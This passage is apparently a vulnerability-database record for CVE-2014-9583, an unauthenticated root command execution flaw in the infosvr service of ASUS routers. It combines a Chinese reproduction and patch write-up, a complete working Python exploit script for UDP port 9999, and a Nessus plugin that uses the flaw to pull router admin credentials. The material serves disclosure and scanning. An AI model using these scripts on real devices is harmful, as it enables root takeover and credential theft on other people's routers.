\u6f0f\u6d1e\u91cd\u73b0</h4>\u6f0f\u6d1e\u6d4b\u8bd5\u811a\u672c\uff1a<a href=\"http://www.exploit-db.com/exploits/35688/\"> http://www.exploit-db.com/exploits/35688/ </a> \u4e0b\u8f7d\u5b58\u5728\u6f0f\u6d1e\u7684\u534e\u7855\u8def\u7531\u56fa\u4ef6\uff1a<a href=\"http://dlsvr04.asus.com/pub/ASUS/wireless/RT-AC66U/FW_RT_AC66U_30043763626.zip\">http://dlsvr04.asus.com/pub/ASUS/wireless/RT-AC66U/FW_RT_AC66U_30043763626.zip</a> binwalk\u89e3\u538b\u6587\u4ef6\uff1a<img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/31.png\" alt=\"31\" width=\"659\" height=\"258\"><img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/image033.png\" alt=\"image033\" width=\"652\" height=\"106\"> \u6a21\u62df\u8fd0\u884c\uff0c\u5982\u56fe\uff1a<img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/image035.png\" alt=\"image035\" width=\"610\" height=\"395\">\u653b\u51fbinfosvr\u7a0b\u5e8f\uff0c\u5982\u56fe\uff1a<img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/image037.png\" alt=\"image037\" width=\"608\" height=\"393\">\u547d\u4ee4\u6267\u884c\u6210\u529f\uff0c\u5982\u56fe\uff1a<img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/image039.png\" alt=\"image039\" width=\"626\" height=\"465\"><h4>e)     \u6f0f\u6d1e\u4fee\u590d</h4>\u5f00\u6e90\u8def\u7531\u5668\u7cfb\u7edfAsuswrt\u5df2\u7ecf2015\u5e741\u670810\u53f7\u4e0b\u5348\u4fee\u590d\u4e86\u6f0f\u6d1e\uff0c\u4fee\u590d\u6f0f\u6d1e\u7684\u529e\u6cd5\u662f\u76f4\u63a5\u6ce8\u91ca\u6389\u4e86\u89e6\u53d1\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\u7684\u5173\u952e\u90e8\u5206\uff0c\u5982\u56fe\uff1a<img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/image041.png\" alt=\"image041\" width=\"644\" height=\"269\">\u534e\u7855\u5b98\u65b9\u4e5f\u63a8\u51fa\u76f8\u5e94\u7684\u56fa\u4ef6\u5347\u7ea7\uff0c\u60f3\u8981\u4fee\u590d\u6f0f\u6d1e\u7684\u7528\u6237\u53ef\u4ee5\u53bb\u4e0b\u8f7d\u76f8\u5173\u8def\u7531\u5668\u578b\u53f7\u7684\u5347\u7ea7\u56fa\u4ef6\uff1a<a href=\"http://www.asus.com.cn/Networking/Wireless_Routers_Products/\">http://www.asus.com.cn/Networking/Wireless_Routers_Products/</a> \u4f8b\u5982RT-AC66U\u578b\u53f7\u8def\u7531\u56682015\u5e741\u670812\u53f7\u63a8\u51fa\u7684\u5347\u7ea7\u7248\u672c\uff0c\u5982\u56fe\uff1a<img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/image043.png\" alt=\"image043\" width=\"611\" height=\"266\"> ZoomEye\u68c0\u6d4b\u62a5\u544a\u7531\u4e8e\u6b64\u6b21\u534e\u7855\u8def\u7531\u5668\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\u96be\u4ee5\u4f7f\u7528\u65e0\u635f\u63a2\u6d4b\u65b9\u6cd5\u63a2\u6d4b\uff0c\u6211\u4eec\u4ec5\u6839\u636e\u7248\u672c\u578b\u53f7\u53bb\u63a8\u6d4b\u6f0f\u6d1e\u7684\u5f71\u54cd\u8303\u56f4\u3002\u628a\u53d7\u5f71\u54cd\u7684\u534e\u7855\u8def\u7531\u5668\u578b\u53f7\u653e\u5728ZoomEye\uff08<a href=\"http://www.zoomeye.org\" rel=\"nofollow\">http://www.zoomeye.org</a>\uff09\u4e2d\u68c0\u7d22\uff0c\u6211\u4eec\u5f97\u5230\u4ee5\u4e0b\u6570\u636e\uff1a<img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/10.jpg\" alt=\"10\" width=\"488\" height=\"186\">RT-AC66U\uff0c21776\u4e2a\uff0c\u5982\u56fe\uff1a<img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/image045.png\" alt=\"image045\" width=\"554\" height=\"286\">RT-N66U\uff0c37156\u4e2a\uff0c\u5982\u56fe\uff1a<img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/222222.jpg\" alt=\"222222\" width=\"555\" height=\"290\">RT-AC87U\uff0c1314\u4e2a\uff0c\u5982\u56fe\uff1a<img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/image049.png\" alt=\"image049\" width=\"539\" height=\"283\">RT-N56U\uff0c23974\u4e2a\uff0c\u5982\u56fe\uff1a<img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/image051.png\" alt=\"image051\" width=\"518\" height=\"322\">\u8def\u7531\u5668\u7cfb\u7edf\u7ba1\u7406\u7aef\u53e3\u6b63\u5e38\u60c5\u51b5\u4e0b\u662f\u4e0d\u4f1a\u66b4\u6f0f\u5728\u516c\u7f51\u4e0a\u7684\uff0c\u6211\u4eec\u68c0\u7d22\u5230\u7684\u53ea\u662f\u66b4\u6f0f\u5728\u516c\u7f51\u4e0a\u5f00\u653e\u7ba1\u7406\u7aef\u53e3\u8def\u7531\u5668\u8bbe\u5907\u7684\uff0c\u76f8\u4fe1\u8fd8\u6709\u66f4\u591a\u7684\u8bbe\u5907\u9690\u85cf\u5728\u80cc\u540e\u3002\u6240\u4ee5\uff0c\u5efa\u8bae\u4f7f\u7528\u8005\u5c3d\u5feb\u5347\u7ea7\u534e\u7855\u8def\u7531\u5668\u7cfb\u7edf\u3002\u76f8\u5173\u8d44\u6e90\u94fe\u63a5<ol><li><a href=\"http://www.freebuf.com/news/56074.html\">http://www.freebuf.com/news/56074.html</a></li><li><a href=\"https://github.com/jduck/asus-cmd\">https://github.com/jduck/asus-cmd</a></li><li><a href=\"https://github.com/RMerl/asuswrt-merlin\">https://github.com/RMerl/asuswrt-merlin</a></li><li><a href=\"http://www.asus.com.cn/Networking/RTAC68U/HelpDesk_Download/\">http://www.asus.com.cn/Networking/RTAC68U/HelpDesk_Download/</a></li></ol> PDF \u4e0b\u8f7d\u5730\u5740\uff1a<a href=\"http://whttp://blog.knownsec.com/wp-content/uploads/2015/01/%E5%8D%8E%E7%A1%95%E8%B7%AF%E7%94%B1%E5%99%A89999%E7%AB%AF%E5%8F%A3%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E7%A0%94%E7%A9%B6%E6%8A%A5%E5%91%8A-V1.pdfww.example.com\" target=\"_blank\">\u534e\u7855\u8def\u7531\u56689999\u7aef\u53e3\u8fdc\u7a0b\u547d\u4ee4\u6267\u884c\u7814\u7a76\u62a5\u544a V1</a> ", "cvss3": {}, "published": "2015-07-02T00:00:00", "type": "seebug", "title": "ASUSWRT 3.0.0.4.376_1071 - LAN Backdoor Command Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-9583"], "modified": "2015-07-02T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-89236", "id": "SSV:89236", "sourceData": "\n #!/usr/bin/env python3\n\n# Exploit Title: ASUSWRT 3.0.0.4.376_1071 LAN Backdoor Command Execution\n# Date: 2014-10-11\n# Vendor Homepage: http://www.asus.com/\n# Software Link: http://dlcdnet.asus.com/pub/ASUS/wireless/RT-N66U_B1/FW_RT_N66U_30043762524.zip\n# Source code: http://dlcdnet.asus.com/pub/ASUS/wireless/RT-N66U_B1/GPL_RT_N66U_30043762524.zip\n# Tested Version: 3.0.0.4.376_1071-g8696125\n# Tested Device: RT-N66U\n\n# Description:\n# A service called \"infosvr\" listens on port 9999 on the LAN bridge.\n# Normally this service is used for device discovery using the\n# \"ASUS Wireless Router Device Discovery Utility\", but this service contains a\n# feature that allows an unauthenticated user on the LAN to execute commands\n# <= 237 bytes as root. Source code is in asuswrt/release/src/router/infosvr.\n# \"iboxcom.h\" is in asuswrt/release/src/router/shared.\n#\n# Affected devices may also include wireless repeaters and other networking\n# products, especially the ones which have \"Device Discovery\" in their features\n# list.\n#\n# Using broadcast address as the IP address should work and execute the command\n# on all devices in the network segment, but only receiving one response is\n# supported by this script.\n\nimport sys, os, socket, struct\n\n\nPORT = 9999\n\nif len(sys.argv) < 3:\n print('Usage: ' + sys.argv[0] + ' <ip> <command>', file=sys.stderr)\n sys.exit(1)\n\n\nip = sys.argv[1]\ncmd = sys.argv[2]\n\nenccmd = cmd.encode()\n\nif len(enccmd) > 237:\n # Strings longer than 237 bytes cause the buffer to overflow and possibly crash the server. \n print('Values over 237 will give rise to undefined behaviour.', file=sys.stderr)\n sys.exit(1)\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nsock.bind(('0.0.0.0', PORT))\nsock.settimeout(2)\n\n# Request consists of following things\n# ServiceID [byte] ; NET_SERVICE_ID_IBOX_INFO\n# PacketType [byte] ; NET_PACKET_TYPE_CMD\n# OpCode [word] ; NET_CMD_ID_MANU_CMD\n# Info [dword] ; Comment: \"Or Transaction ID\"\n# MacAddress [byte[6]] ; Double-wrongly \"checked\" with memcpy instead of memcmp\n# Password [byte[32]] ; Not checked at all\n# Length [word]\n# Command [byte[420]] ; 420 bytes in struct, 256 - 19 unusable in code = 237 usable\n\npacket = (b'\\x0C\\x15\\x33\\x00' + os.urandom(4) + (b'\\x00' * 38) + struct.pack('<H', len(enccmd)) + enccmd).ljust(512, b'\\x00')\n\nsock.sendto(packet, (ip, PORT))\n\n\n# Response consists of following things\n# ServiceID [byte] ; NET_SERVICE_ID_IBOX_INFO\n# PacketType [byte] ; NET_PACKET_TYPE_RES\n# OpCode [word] ; NET_CMD_ID_MANU_CMD\n# Info [dword] ; Equal to Info of request\n# MacAddress [byte[6]] ; Filled in for us\n# Length [word]\n# Result [byte[420]] ; Actually returns that amount\n\nwhile True:\n data, addr = sock.recvfrom(512)\n\n if len(data) == 512 and data[1] == 22:\n break\n\nlength = struct.unpack('<H', data[14:16])[0]\ns = slice(16, 16+length)\nsys.stdout.buffer.write(data[s])\n\nsock.close()\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-89236", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2023-05-18T14:09:32", "description": "The remote device is an ASUS router that contains firmware which is affected by a flaw in its 'infosvr' service due to not properly checking the MAC address of a request. An unauthenticated, remote attacker, using a crafted request to UDP port 9999, can exploit this to run arbitrary commands or access configuration details (including passwords) on the device.", "cvss3": {}, "published": "2015-01-14T00:00:00", "type": "nessus", "title": "ASUS Router 'infosvr' Remote Command Execution", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-9583"], "modified": "2019-11-25T00:00:00", "cpe": ["cpe:/o:asus:rt-ac66u_firmware", "cpe:/o:asus:rt-n66u_firmware"], "id": "ASUSWRT_INFOSVR_COMMAND_EXEC.NASL", "href": "https://www.tenable.com/plugins/nessus/80518", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(80518);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\"CVE-2014-9583\");\n script_bugtraq_id(71889);\n script_xref(name:\"EDB-ID\", value:\"35688\");\n\n script_name(english:\"ASUS Router 'infosvr' Remote Command Execution\");\n script_summary(english:\"Attempts to exploit the ASUS Router 'infosvr' service backdoor.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device contains a backdoor.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote device is an ASUS router that contains firmware which is\naffected by a flaw in its 'infosvr' service due to not properly\nchecking the MAC address of a request. An unauthenticated, remote\nattacker, using a crafted request to UDP port 9999, can exploit this\nto run arbitrary commands or access configuration details (including\npasswords) on the device.\");\n # https://packetstormsecurity.com/files/129815/ASUSWRT-3.0.0.4.376_1071-LAN-Backdoor-Command-Execution.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ba42dc23\");\n script_set_attribute(attribute:\"see_also\", value:\"https://event.asus.com/2013/nw/ASUSWRT/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/jduck/asus-cmd\");\n script_set_attribute(attribute:\"solution\", value:\n\"Contact the device vendor regarding the availability of an update.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:U/RC:ND\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ASUS infosvr Auth Bypass Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:asus:rt-ac66u_firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:asus:rt-n66u_firmware\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"Backdoors\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_require_udp_ports(9999);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"raw.inc\");\ninclude(\"data_protection.inc\");\n\nport = 9999;\n\nif (islocalhost()) exit(0, \"This plugin can not be run against the localhost.\");\nif (!islocalnet()) exit(0, \"The remote host is more than one hop away.\");\n\nif (known_service(port:port, ipproto:\"udp\")) audit(AUDIT_SVC_ALREADY_KNOWN, port);\nif (!get_udp_port_state(port)) audit(AUDIT_PORT_CLOSED, port, \"udp\");\n\nset_byte_order(BYTE_ORDER_LITTLE_ENDIAN);\n\nfunction run_command(udp_socket, command, timeout)\n{\n local_var packet, ll, bpf, output, res, pkt, data, out_len;\n\n output = NULL;\n\n packet =\n mkbyte(0x0C) +\n mkbyte(0x15) +\n mkword(0x0033) +\n mkdword(rand()) +\n mkpad(38) +\n mkword(strlen(command)) +\n command;\n\n packet = packet + mkpad(512 - strlen(packet));\n\n ll = link_layer();\n if (isnull(ll)) exit(1, \"Could not find the link layer we are operating on.\");\n\n bpf = bpf_open(\"udp and src port 9999 and dst port 9999 and dst host 255.255.255.255\");\n if (isnull(bpf)) exit(1, \"Could not obtain a bpf.\");\n\n send(socket:udp_socket, data:packet);\n\n res = bpf_next(bpf:bpf, timeout:timeout);\n if (!isnull(res))\n {\n res = substr(res, strlen(ll), strlen(res) - 1);\n if (!isnull(res))\n {\n pkt = packet_split(res);\n if (!isnull(pkt) && !isnull(pkt[2]) &&!isnull(pkt[2]['data']))\n {\n data = pkt[2]['data'];\n if (strlen(data) >= 16)\n {\n out_len = getword(blob:data, pos:14);\n if (out_len > 0)\n {\n output = chomp(substr(data, 16, 15 + out_len));\n }\n }\n }\n }\n }\n\n bpf_close(bpf);\n\n return output;\n}\n\ns = open_sock_udp(port);\nif (!s) audit(AUDIT_SOCK_FAIL, port, \"udp\");\n\ntimeout = get_read_timeout() * 1000;\n\nwps_mfstring = run_command(udp_socket:s, command:\"nvram get wps_mfstring\", timeout:timeout);\n\nif (\"ASUS\" >!< wps_mfstring) audit(AUDIT_NOT_LISTEN, \"The ASUSWRT 'infosvr' service\", port, \"udp\");\n\nuser = run_command(udp_socket:s, command:\"nvram get http_username\", timeout:timeout);\npass = run_command(udp_socket:s, command:\"nvram get http_passwd\", timeout:timeout);\n\n# mask the actual password except the first and last character\nif (!isnull(pass) && strlen(pass) >= 2)\n pass = pass[0] + crap(data:'*', length:6) + pass[strlen(pass)-1];\n\nregister_service(port:port, ipproto:\"udp\", proto:\"asuswrt_infosvr\");\n\nif (report_verbosity > 0 && !isnull(user) && !isnull(pass))\n{\n report =\n '\\nNessus was able to exploit the vulnerability to gather the HTTP' +\n '\\ncredentials of the ASUS router:' +\n '\\n' +\n '\\n Username : ' + data_protection::sanitize_user_enum(users:user) +\n '\\n Password : ' + pass +\n '\\n' +\n '\\nNote that the password displayed here has been partially obfuscated.' +\n '\\n';\n\n security_hole(port:port, proto:\"udp\", extra:report);\n}\nelse security_hole(port:port, proto:\"udp\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}]}

ASUS Patches Root Command Execution Flaws Haunting Over a Dozen Router Models

Description

Related